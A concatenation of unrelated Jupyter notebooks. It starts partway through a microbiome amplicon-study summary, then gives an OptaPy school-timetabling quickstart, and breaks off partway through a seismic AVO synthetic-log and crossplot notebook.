['../studies/18/all.biom'] ------------- AmpliconExperiment with 84 samples, 1183 features ********** ../studies/27 ['../studies/27/all.biom'] ------------- AmpliconExperiment with 233 samples, 1403 features ********** ../studies/9 ['../studies/9/all.biom'] ------------- AmpliconExperiment with 451 samples, 3722 features ********** ../studies/11 ['../studies/11/all.biom'] ------------- AmpliconExperiment with 109 samples, 2312 features ********** ../studies/7 ['../studies/7/all.biom'] ------------- AmpliconExperiment with 441 samples, 4403 features ********** ../studies/29 ['../studies/29/all.biom'] ------------- AmpliconExperiment with 594 samples, 3470 features ********** ../studies/16 ['../studies/16/all.biom'] ------------- AmpliconExperiment with 119 samples, 2116 features ********** ../studies/42 ['../studies/42/all.biom'] ------------- AmpliconExperiment with 96 samples, 3829 features ********** ../studies/45 ['../studies/45/all.biom'] ------------- AmpliconExperiment with 1043 samples, 14981 features ********** ../studies/6 ['../studies/6/all.biom'] ------------- AmpliconExperiment with 612 samples, 4175 features ********** ../studies/28 ['../studies/28/all.biom'] ------------- AmpliconExperiment with 135 samples, 1306 features ********** ../studies/17 ['../studies/17/all.biom'] ------------- AmpliconExperiment with 50 samples, 2307 features ********** ../studies/1 ['../studies/1/all.biom'] ------------- AmpliconExperiment with 38 samples, 1082 features ********** ../studies/10 ['../studies/10/all.biom'] ------------- AmpliconExperiment with 174 samples, 3295 features ********** ../studies/19 ['../studies/19/all.biom'] ------------- AmpliconExperiment with 68 samples, 1401 features ********** ../studies/26 ['../studies/26/all.biom'] ------------- AmpliconExperiment with 25 samples, 11834 features ********** ../studies/8 ['../studies/8/all.biom'] ------------- AmpliconExperiment with 33 samples, 780 features ********** ../studies/21 ['../studies/21/all.biom'] ------------- AmpliconExperiment with 178 samples, 2597 features ********** ../studies/44 ['../studies/44/all.biom'] ------------- AmpliconExperiment with 835 samples, 11915 features ********** ../studies/43 ['../studies/43/all.biom'] ------------- AmpliconExperiment with 89 samples, 3426 features ********** ../studies/36 ['../studies/36/all.biom'] ------------- AmpliconExperiment with 15 samples, 1191 features ********** ../studies/31 ['../studies/31/all.biom'] ------------- AmpliconExperiment with 70 samples, 1929 features ********** ../studies/62 ['../studies/62/all.biom'] ------------- AmpliconExperiment with 196 samples, 5813 features ********** ../studies/54 ['../studies/54/all.biom'] ------------- AmpliconExperiment with 63 samples, 3657 features ********** ../studies/53 ['../studies/53/all.biom'] ------------- AmpliconExperiment with 115 samples, 4878 features ********** ../studies/37 ['../studies/37/all.biom'] ------------- AmpliconExperiment with 727 samples, 12055 features ********** ../studies/39 ['../studies/39/all.biom'] ------------- AmpliconExperiment with 587 samples, 10422 features ********** ../studies/52 ['../studies/52/all.biom'] ------------- AmpliconExperiment with 30 samples, 2580 features ********** ../studies/55 ['../studies/55/all.biom'] ------------- AmpliconExperiment with 74 samples, 3939 features ********** ../studies/46 ['../studies/46/all.biom'] ------------- AmpliconExperiment with 554 samples, 10980 features ********** ../studies/41 ['../studies/41/all.biom'] ------------- AmpliconExperiment with 80 samples, 3557 features ********** ../studies/48 ['../studies/48/all.biom'] ------------- AmpliconExperiment with 280 samples, 6184 features ********** ../studies/24 ['../studies/24/all.biom'] ------------- AmpliconExperiment with 25 samples, 999 features ********** ../studies/23 ['../studies/23/all.biom'] ------------- AmpliconExperiment with 114 samples, 1867 features ********** ../studies/4 ['../studies/4/all.biom'] ------------- AmpliconExperiment with 82 samples, 1652 features ********** ../studies/15 ['../studies/15/all.biom'] ------------- AmpliconExperiment with 162 samples, 2103 features ********** ../studies/3 ['../studies/3/all.biom'] ------------- AmpliconExperiment with 334 samples, 3021 features ********** ../studies/12 ['../studies/12/all.biom'] ------------- AmpliconExperiment with 224 samples, 13732 features ********** ../studies/49 ['../studies/49/all.biom'] ------------- AmpliconExperiment with 263 samples, 8112 features ********** ../studies/40 ['../studies/40/all.biom'] ------------- AmpliconExperiment with 85 samples, 3917 features ********** ../studies/47 ['../studies/47/all.biom'] ------------- AmpliconExperiment with 247 samples, 7437 features ********** ../studies/2 ['../studies/2/all.biom'] ------------- AmpliconExperiment with 179 samples, 2528 features ********** ../studies/13 ['../studies/13/all.biom'] ------------- AmpliconExperiment with 31 samples, 925 features ********** ../studies/5 ['../studies/5/all.biom'] ------------- AmpliconExperiment with 333 samples, 4664 features ********** ../studies/14 ['../studies/14/all.biom'] ------------- AmpliconExperiment with 123 samples, 1271 features ********** ../studies/22 ['../studies/22/all.biom'] ------------- AmpliconExperiment with 144 samples, 2687 features ********** ../studies/25 ['../studies/25/all.biom'] ------------- AmpliconExperiment with 89 samples, 1781 features processed 59 studies ###Markdown Plot the summary stats ###Code df=pd.read_csv(join(save_dir,'summary.txt'), sep='\t') df=df.sort_values('median') f=plt.figure() plt.bar(np.arange(len(df)),df['median']) plt.yscale('log') plt.ylabel('median reads/study') plt.xlabel('study') pass df=df.sort_values('mean') f=plt.figure() plt.bar(np.arange(len(df)),df['mean']) plt.yscale('log') plt.ylabel('mean reads/study') plt.xlabel('study') pass plt.figure() plt.hist(df['median'],60) plt.xlabel('median reads/study') plt.ylabel('number of studies') pass df=df.sort_values('median') df ###Output _____no_output_____ ###Markdown Choose the rarefaction depth to work with ###Code df=df.sort_values('num_rare_4000') df ###Output _____no_output_____
school-timetabling/school-timetabling-quickstart.ipynb
###Markdown OptaPy - OptaPlanner in PythonOptaPy is an **AI constraint solver for Python** to optimize the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more planning problems.OptaPy wraps the [OptaPlanner](https://www.optaplanner.org/) engine internally, but using OptaPy in Python is significantly slower than using OptaPlanner in Java or Kotlin.WARNING: OptaPy is an experimental technology. It is at least 20 times slower than using OptaPlanner in Java or Kotlin. What is OptaPlanner?OptaPlanner is an AI constraint solver. It optimizes planning and scheduling problems, such as the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more. Every organization faces such challenges: assign a limited set of constrained resources (employees, assets, time and/or money) to provide products or services. OptaPlanner delivers more efficient plans, which reduce costs and improve service quality.Constraints apply on plain domain objects and can call existing code. There’s no need to input constraints as mathematical equations. Under the hood, OptaPlanner combines sophisticated Artificial Intelligence optimization algorithms (such as Tabu Search, Simulated Annealing, Late Acceptance and other metaheuristics) with very efficient score calculation and other state-of-the-art constraint solving techniques. An Example: School Timetabling Model the domain objects and constraintsThe goal is to assign each lesson to a time slot and a room. The model is divided into four kind of objects Problem FactsProblem facts are facts about the problem. As such, they do not change during solving (and thus cannot have any planning variables). An example problem fact is shown below: ###Code from optapy import problem_fact, planning_id @problem_fact class Room: def __init__(self, id, name): self.id = id self.name = name @planning_id def get_id(self): return self.id def __str__(self): return f"Room(id={self.id}, name={self.name})" ###Output _____no_output_____ ###Markdown The `@problem_fact` decorator creates a Java class for Room, which allows it to be used in constraints. The `@planning_id` decorator tells OptaPlanner that it can use that method for identifying identifical pairs. It is only required if you use `fromUniquePair` on the class in a constraint.The code for the Timeslot probelm fact is shown below: ###Code @problem_fact class Timeslot: def __init__(self, id, day_of_week, start_time, end_time): self.id = id self.day_of_week = day_of_week self.start_time = start_time self.end_time = end_time @planning_id def get_id(self): return self.id def __str__(self): return ( f"Timeslot(" f"id={self.id}, " f"day_of_week={self.day_of_week}, " f"start_time={self.start_time}, " f"end_time={self.end_time})" ) ###Output _____no_output_____ ###Markdown Planning EntitiesDuring a lesson, represented by the Lesson class, a teacher teaches a subject to a group of students, for example, Math by A.Turing for 9th grade or Chemistry by M.Curie for 10th grade. If a subject is taught multiple times per week by the same teacher to the same student group, there are multiple Lesson instances that are only distinguishable by id. For example, the 9th grade has six math lessons a week.During solving, OptaPlanner changes the timeslot and room fields of the Lesson class, to assign each lesson to a time slot and a room. Because OptaPlanner changes these fields, Lesson is a planning entity. Here is how we would write it in Python: ###Code from optapy import planning_entity, planning_variable @planning_entity class Lesson: def __init__(self, id, subject, teacher, student_group, timeslot=None, room=None): self.id = id self.subject = subject self.teacher = teacher self.student_group = student_group self.timeslot = timeslot self.room = room @planning_id def get_id(self): return self.id @planning_variable(Timeslot, ["timeslotRange"]) def get_timeslot(self): return self.timeslot def set_timeslot(self, new_timeslot): self.timeslot = new_timeslot @planning_variable(Room, ["roomRange"]) def get_room(self): return self.room def set_room(self, new_room): self.room = new_room def __str__(self): return ( f"Lesson(" f"id={self.id}, " f"timeslot={self.timeslot}, " f"room={self.room}, " f"teacher={self.teacher}, " f"subject={self.subject}, " f"student_group={self.student_group}" f")" ) ###Output _____no_output_____ ###Markdown The `@planning_entity` decorator creates a Java class for Lesson, which allows it to be used in constraints.The `@planning_variable` specify that a method returns a planning variable. As such, OptaPlanner will call the corresponding setter to change the value of the variable during solving. It must be named `get%Variable()` and has a corresponding setter `set%Variable` (where `%Variable` is the name of the variable). It takes two parameters:- The first parameter is the type this planning variable takes.- The second parameter, `value_range_provider_refs`, describes where it gets its values from. It a list of the id of its value range providers The ConstraintsThe constraints tell OptaPlanner how good a solution is. Here how we create the constraints in Python: ###Code from optapy import constraint_provider, get_class from optapy.types import Joiners, HardSoftScore from datetime import datetime, date, timedelta LessonClass = get_class(Lesson) RoomClass = get_class(Room) # Trick since timedelta only works with datetime instances today = date.today() def within_30_minutes(lesson1, lesson2): between = datetime.combine(today, lesson1.timeslot.end_time) - datetime.combine(today, lesson2.timeslot.start_time) return timedelta(minutes=0) <= between <= timedelta(minutes=30) @constraint_provider def define_constraints(constraint_factory): return [ # Hard constraints room_conflict(constraint_factory), teacher_conflict(constraint_factory), student_group_conflict(constraint_factory), # Soft constraints teacher_room_stability(constraint_factory), teacher_time_efficiency(constraint_factory), student_group_subject_variety(constraint_factory) ] def room_conflict(constraint_factory): # A room can accommodate at most one lesson at the same time. return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ # ... in the same timeslot ... Joiners.equal(lambda lesson: lesson.timeslot), # ... in the same room ... Joiners.equal(lambda lesson: lesson.room), # form unique pairs Joiners.lessThan(lambda lesson: lesson.id) ]) \ .penalize("Room conflict", HardSoftScore.ONE_HARD) def teacher_conflict(constraint_factory): # A teacher can teach at most one lesson at the same time. return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.timeslot), Joiners.equal(lambda lesson: lesson.teacher), Joiners.lessThan(lambda lesson: lesson.id) ]) \ .penalize("Teacher conflict", HardSoftScore.ONE_HARD) def student_group_conflict(constraint_factory): # A student can attend at most one lesson at the same time. return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.timeslot), Joiners.equal(lambda lesson: lesson.student_group), Joiners.lessThan(lambda lesson: lesson.id) ]) \ .penalize("Student group conflict", HardSoftScore.ONE_HARD) def teacher_room_stability(constraint_factory): # A teacher prefers to teach in a single room. return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.teacher), Joiners.lessThan(lambda lesson: lesson.id) ]) \ .filter(lambda lesson1, lesson2: lesson1.room != lesson2.room) \ .penalize("Teacher room stability", HardSoftScore.ONE_SOFT) def teacher_time_efficiency(constraint_factory): # A teacher prefers to teach sequential lessons and dislikes gaps between lessons. return constraint_factory.forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.teacher), Joiners.equal(lambda lesson: lesson.timeslot.day_of_week) ]) \ .filter(within_30_minutes) \ .reward("Teacher time efficiency", HardSoftScore.ONE_SOFT) def student_group_subject_variety(constraint_factory): # A student group dislikes sequential lessons on the same subject. return constraint_factory.forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.subject), Joiners.equal(lambda lesson: lesson.student_group), Joiners.equal(lambda lesson: lesson.timeslot.day_of_week) ]) \ .filter(within_30_minutes) \ .penalize("Student group subject variety", HardSoftScore.ONE_SOFT) ###Output _____no_output_____ ###Markdown The `@constraint_provider` decorator creates a Java `ConstraintProvider` class, allowing OptaPlanner to use it. You can call any python method when evaluating your constraints. Planning SolutionFinally, there is the planning solution. The planning solution stores references to all the problem facts and planning entities that define the problem. Additionally, it also contain the score of the solution. The planning solution class represent both the problem and the solution; as such, a problem can be viewed as an unintialized planning solution. Here how we define it in Python: ###Code from optapy import planning_solution, planning_entity_collection_property, \ problem_fact_collection_property, \ value_range_provider, planning_score def format_list(a_list): return ',\n'.join(map(str, a_list)) @planning_solution class TimeTable: def __init__(self, timeslot_list, room_list, lesson_list, score=None): self.timeslot_list = timeslot_list self.room_list = room_list self.lesson_list = lesson_list self.score = score def set_student_group_and_teacher_list(self): self.student_group_list = [] self.teacher_list = [] for lesson in self.lesson_list: if lesson.teacher not in self.teacher_list: self.teacher_list.append(lesson.teacher) if lesson.student_group not in self.student_group_list: self.student_group_list.append(lesson.student_group) @problem_fact_collection_property(Timeslot) @value_range_provider("timeslotRange") def get_timeslot_list(self): return self.timeslot_list @problem_fact_collection_property(Room) @value_range_provider("roomRange") def get_room_list(self): return self.room_list @planning_entity_collection_property(Lesson) def get_lesson_list(self): return self.lesson_list @planning_score(HardSoftScore) def get_score(self): return self.score def set_score(self, score): self.score = score def __str__(self): return ( f"TimeTable(" f"timeslot_list={format_list(self.timeslot_list)},\n" f"room_list={format_list(self.room_list)},\n" f"lesson_list={format_list(self.lesson_list)},\n" f"score={str(self.score.toString()) if self.score is not None else 'None'}" f")" ) ###Output _____no_output_____ ###Markdown The `@planning_solution` decorator creates a Java class for TimeTable, allowing it to be passed to OptaPlanner.The `@problem_fact_collection_property` decorator tells OptaPlanner that method returns problem facts (it takes in one required argument: the Python class of the problem fact). Similarly, the `@planning_entity_collection_property` decorator tells OptaPlanner that method returns planning entities (it takes in one required argument: the Python class of the planning entity). The `@value_range_provider` decorator tells OptaPlanner the method provide values for variables. It `range_id` parameter is used determine what planning variable(s) accept values from it. For example, `timeslot` take values from the `timeslotRange`, so it accept values from `getTimeslotList`. Finally, the `@planning_score` decorator tells OptaPlanner the method returns the planning score (how good the solution is). Like with `@planning_variable`, It must be named `get%Score()` and has a corresponding setter `set%Score` (where `%Score` is the name of the score). Its parameter tells OptaPlanner what kind of score it takes. SolvingNow that we defined our model and constraints, let create an instance of the problem: ###Code from datetime import time def generate_problem(): timeslot_list = [ Timeslot(1, "MONDAY", time(hour=8, minute=30), time(hour=9, minute=30)), Timeslot(2, "MONDAY", time(hour=9, minute=30), time(hour=10, minute=30)), Timeslot(3, "MONDAY", time(hour=10, minute=30), time(hour=11, minute=30)), Timeslot(4, "MONDAY", time(hour=13, minute=30), time(hour=14, minute=30)), Timeslot(5, "MONDAY", time(hour=14, minute=30), time(hour=15, minute=30)), Timeslot(6, "TUESDAY", time(hour=8, minute=30), time(hour=9, minute=30)), Timeslot(7, "TUESDAY", time(hour=9, minute=30), time(hour=10, minute=30)), Timeslot(8, "TUESDAY", time(hour=10, minute=30), time(hour=11, minute=30)), Timeslot(9, "TUESDAY", time(hour=13, minute=30), time(hour=14, minute=30)), Timeslot(10, "TUESDAY", time(hour=14, minute=30), time(hour=15, minute=30)), ] room_list = [ Room(1, "Room A"), Room(2, "Room B"), Room(3, "Room C") ] lesson_list = [ Lesson(1, "Math", "A. Turing", "9th grade"), Lesson(2, "Math", "A. Turing", "9th grade"), Lesson(3, "Physics", "M. Curie", "9th grade"), Lesson(4, "Chemistry", "M. Curie", "9th grade"), Lesson(5, "Biology", "C. Darwin", "9th grade"), Lesson(6, "History", "I. Jones", "9th grade"), Lesson(7, "English", "I. Jones", "9th grade"), Lesson(8, "English", "I. Jones", "9th grade"), Lesson(9, "Spanish", "P. Cruz", "9th grade"), Lesson(10, "Spanish", "P. Cruz", "9th grade"), Lesson(11, "Math", "A. Turing", "10th grade"), Lesson(12, "Math", "A. Turing", "10th grade"), Lesson(13, "Math", "A. Turing", "10th grade"), Lesson(14, "Physics", "M. Curie", "10th grade"), Lesson(15, "Chemistry", "M. Curie", "10th grade"), Lesson(16, "French", "M. Curie", "10th grade"), Lesson(17, "Geography", "C. Darwin", "10th grade"), Lesson(18, "History", "I. Jones", "10th grade"), Lesson(19, "English", "P. Cruz", "10th grade"), Lesson(20, "Spanish", "P. Cruz", "10th grade"), ] lesson = lesson_list[0] lesson.set_timeslot(timeslot_list[0]) lesson.set_room(room_list[0]) return TimeTable(timeslot_list, room_list, lesson_list) ###Output _____no_output_____ ###Markdown and solve it: ###Code from optapy import solver_manager_create from optapy.types import SolverConfig, Duration from tango import pick_color from ipywidgets import Tab from ipysheet import sheet, cell, row, column, cell_range solver_config = SolverConfig().withEntityClasses(get_class(Lesson)) \ .withSolutionClass(get_class(TimeTable)) \ .withConstraintProviderClass(get_class(define_constraints)) \ .withTerminationSpentLimit(Duration.ofSeconds(30)) solution = generate_problem() solution.set_student_group_and_teacher_list() cell_map = dict() def on_best_solution_changed(best_solution): global timetable global solution global cell_map solution = best_solution unassigned_lessons = [] clear_cell_set = set() for (table_name, table_map) in cell_map.items(): for (key, cell) in table_map.items(): clear_cell_set.add(cell) for lesson in solution.lesson_list: if lesson.timeslot is None or lesson.room is None: unassigned_lessons.append(lesson, clear_cell_set) else: update_lesson_in_table(lesson, clear_cell_set) for cell in clear_cell_set: cell.value = "" cell.style["backgroundColor"] = "white" for (table_name, table_map) in cell_map.items(): for (key, cell) in table_map.items(): cell.send_state() def update_lesson_in_table(lesson, clear_cell_set): global cell_map x = solution.timeslot_list.index(lesson.timeslot) room_column = solution.room_list.index(lesson.room) teacher_column = solution.teacher_list.index(lesson.teacher) student_group_column = solution.student_group_list.index(lesson.student_group) color = pick_color(lesson.subject) room_cell = cell_map['room'][(x, room_column)] teacher_cell = cell_map['teacher'][(x, teacher_column)] student_group_cell = cell_map['student_group'][(x, student_group_column)] clear_cell_set.discard(room_cell) clear_cell_set.discard(teacher_cell) clear_cell_set.discard(student_group_cell) room_cell.value = f"{lesson.subject}\n{lesson.teacher}\n{lesson.student_group}" room_cell.style["backgroundColor"] = color room_cell.send_state() teacher_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.student_group}" teacher_cell.style["backgroundColor"] = color teacher_cell.send_state() student_group_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.teacher}" student_group_cell.style["backgroundColor"] = color student_group_cell.send_state() def create_table(table_name, solution, columns, name_map): global cell_map out = sheet(rows=len(solution.timeslot_list) + 1, columns=len(columns) + 1) header_color = "#22222222" cell(0,0, read_only=True, background_color=header_color) header_row = row(0, list(map(name_map, columns)), column_start=1, read_only=True, background_color=header_color) timeslot_column = column(0, list(map(lambda timeslot: timeslot.day_of_week[0:3] + " " + str(timeslot.start_time)[0:10], solution.timeslot_list)), row_start=1, read_only=True, background_color=header_color) table_cells = dict() cell_map[table_name] = table_cells for x in range(len(solution.timeslot_list)): for y in range(len(columns)): table_cells[(x, y)] = cell(x + 1, y + 1, "", read_only=True) return out solver_manager = solver_manager_create(solver_config) by_room_table = create_table('room', solution, solution.room_list, lambda room: room.name) by_teacher_table = create_table('teacher', solution, solution.teacher_list, lambda teacher: teacher) by_student_group_table = create_table('student_group', solution, solution.student_group_list, lambda student_group: student_group) solver_manager.solveAndListen(0, lambda the_id: solution, on_best_solution_changed) tab = Tab() tab.children = [by_room_table, by_teacher_table, by_student_group_table] tab.set_title(0, 'By Room') tab.set_title(1, 'By Teacher') tab.set_title(2, 'By Student Group') tab ###Output _____no_output_____
1_synthetic/4_avo_synthetic.ipynb
###Markdown Compute the elastic impedance, the normalized elastic impedance and the lrm ###Code import numpy as np import matplotlib.pyplot as plt import matplotlib.colors as colors import impedance as ip %matplotlib inline ###Output _____no_output_____ ###Markdown Elastic properties for AVO classesThe cell below defines the elastic properties for AVO classes compiled by [Alessandro del Monte](http://nbviewer.ipython.org/github/aadm/geophysical_notes/blob/master/avo_explorer_v2_mono.ipynb). Originally, Class IV is from Castagna & Swan (1997) "Principles of AVO crossplotting" (1997) and the others from Hilterman (2001) "Seismic Amplitude Interpretation". ###Code shale = np.array([[3094,1515,2.40], [2643,1167,2.29], [2192,818,2.16], [3240,1620,2.34]]) sandgas = np.array([[4050,2526,2.21], [2781,1665,2.08], [1542,901,1.88], [1650,1090,2.07]]) sandbrine = np.array([[4115,2453,2.32], [3048,1595,2.23], [2134,860,2.11], [2590,1060,2.21]]) avocl=['Class I','Class II','Class III','Class IV'] angle = 30 ###Output _____no_output_____ ###Markdown The properties will generate the logs ###Code faceis_vet = np.zeros(5) vp=np.zeros(5) + shale[0,0] vs = np.zeros(5) + shale[0,1] rho = np.zeros(5) + shale[0,2] for i in range (len(avocl)): vp1 = np.zeros(100) + shale[i,0] #m/s vs1 = np.zeros(100) + shale[i,1] rho1 = np.zeros(100) + shale[i,2] #g/cc faceis_vet1 = np.zeros(100) vp2 = np.zeros(100) + sandgas[i,0] vs2 = np.zeros(100) + sandgas[i,1] #m/s rho2 = np.zeros(100) + sandgas[i,2] #g/cc faceis_vet2 = np.zeros(100) + 1 vp3 = np.zeros(100) + sandbrine[i,0] vs3 = np.zeros(100) + sandbrine[i,1] #m/s rho3 = np.zeros(100) + sandbrine[i,2] #g/cc faceis_vet3 = np.zeros(100) + 2 vp=np.concatenate((vp,vp1,vp2,vp1,vp3)) vs=np.concatenate((vs,vs1,vs2,vs1,vs3)) rho=np.concatenate((rho,rho1,rho2,rho1,rho3)) faceis_vet=np.concatenate((faceis_vet,faceis_vet1,faceis_vet2,faceis_vet1,faceis_vet3)) vp += np.random.normal(0, np.max(np.abs(vp))*0.005, len(vp)) vs += np.random.normal(0, np.max(np.abs(vs))*0.005, len(vs)) rho += np.random.normal(0, np.max(np.abs(rho))*0.1, len(rho.shape)) vpvs=vp/vs #poisson ratio pr=0.5*((vpvs**2-2)/(vpvs**2-1)) ai=ip.ai(vp,rho) # acoustic impedance ei=ip.ei(vp,vs,rho,angle) # elastic impedance nei=ip.nei(vp,vs,rho,shale[2,0],shale[2,1],shale[2,2],angle) # normalized elastic impedance lambda_rho,mu_rho=ip.lrm(vp,vs,rho) # lambda rho and mu rho ###Output _____no_output_____ ###Markdown Plot the logs - the tops of the gas sands are in red ###Code fig=plt.figure(figsize=(12,15)) ax=plt.subplot(2,5,1) plt.title('vp',fontsize=13) plt.plot(vp,np.arange(vp.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.hlines(505,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.hlines(905,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.hlines(1305,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,2) plt.title('vs',fontsize=13) plt.plot(vs,np.arange(vs.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.hlines(505,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.hlines(905,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.hlines(1305,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,3) plt.title('rho',fontsize=13) plt.plot(rho,np.arange(rho.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.hlines(505,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.hlines(905,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.hlines(1305,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,4) plt.title('vp/vs',fontsize=13) plt.plot(vpvs,np.arange(vpvs.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.hlines(505,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.hlines(905,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.hlines(1305,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,5) plt.title('poisson ratio',fontsize=13) plt.plot(pr,np.arange(pr.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.hlines(505,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.hlines(905,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.hlines(1305,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,6) plt.title(r'$\lambda\rho - \mu\rho$',fontsize=13) plt.plot(lambda_rho,np.arange(lambda_rho.shape[0]),label=r'$\lambda\rho$',color='darkblue') plt.plot(mu_rho,np.arange(mu_rho.shape[0]),label=r'$\mu\rho$',color='darkgreen') ax.invert_yaxis() plt.legend(loc='lower left') plt.hlines(105,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.hlines(505,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.hlines(905,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.hlines(1305,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,7) plt.title('AI',fontsize=13) plt.plot(ai,np.arange(ai.shape[0]),color='darkblue') ax.invert_yaxis() plt.hlines(105,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.hlines(505,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.hlines(905,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.hlines(1305,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,8) plt.title('EI',fontsize=13) plt.plot(ei,np.arange(ei.shape[0]),color='darkgreen') ax.invert_yaxis() plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,9) plt.title('NEI',fontsize=13) plt.plot(nei,np.arange(nei.shape[0]),color='darkorange') ax.invert_yaxis() plt.hlines(105,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.hlines(505,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.hlines(905,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.hlines(1305,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,10) plt.title('AI - EI - NEI',fontsize=13) plt.plot(ai,np.arange(ai.shape[0]),label='ai',color='darkblue') plt.plot(ei,np.arange(ei.shape[0]),label='ei',color='darkgreen') plt.plot(nei,np.arange(nei.shape[0]),label='nei',color='darkorange') plt.legend(loc='center left', bbox_to_anchor=(1, 0.5)) ax.invert_yaxis() plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.grid(True) plt.tight_layout() ###Output _____no_output_____ ###Markdown Crossplots ###Code #colormap from del Monte (2015) # 0=brine 1=gas 2=shale ccc = ['blue','red','green'] cmap_facies = colors.ListedColormap(ccc[0:len(ccc)], 'indexed') fig=plt.figure(figsize=(16,6)) ax=plt.subplot(2,4,1) plt.scatter(vp,rho,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('Vp (m/s)') ax.set_ylabel('Rhob (g/cc)') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['brine', 'gas', 'shale'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,2) plt.scatter(vp,vs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('Vp (m/s)') ax.set_ylabel('Vs (m/s)') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['brine', 'gas', 'shale'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,3) plt.scatter(vs,vpvs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('Vs (km/s)') ax.set_ylabel('Vp/Vs') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['brine', 'gas', 'shale'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,4) plt.scatter(lambda_rho,mu_rho,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel(r'$\lambda\rho (g^2/cc^2 x m^2/s^2)$') ax.set_ylabel(r'$\mu\rho (g^2/cc^2 x m^2/s^2)$') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['brine', 'gas', 'shale'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,5) plt.scatter(ai,vpvs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('AI (g/cc x m/s)') ax.set_ylabel('Vp/Vs') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['brine', 'gas', 'shale'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,6) plt.scatter(nei,vpvs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('NEI (g/cc x m/s)') ax.set_ylabel('Vp/Vs') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['brine', 'gas', 'shale'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,7) plt.scatter(nei,ai,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('NEI (g/cc x m/s)') ax.set_ylabel('AI (g/cc 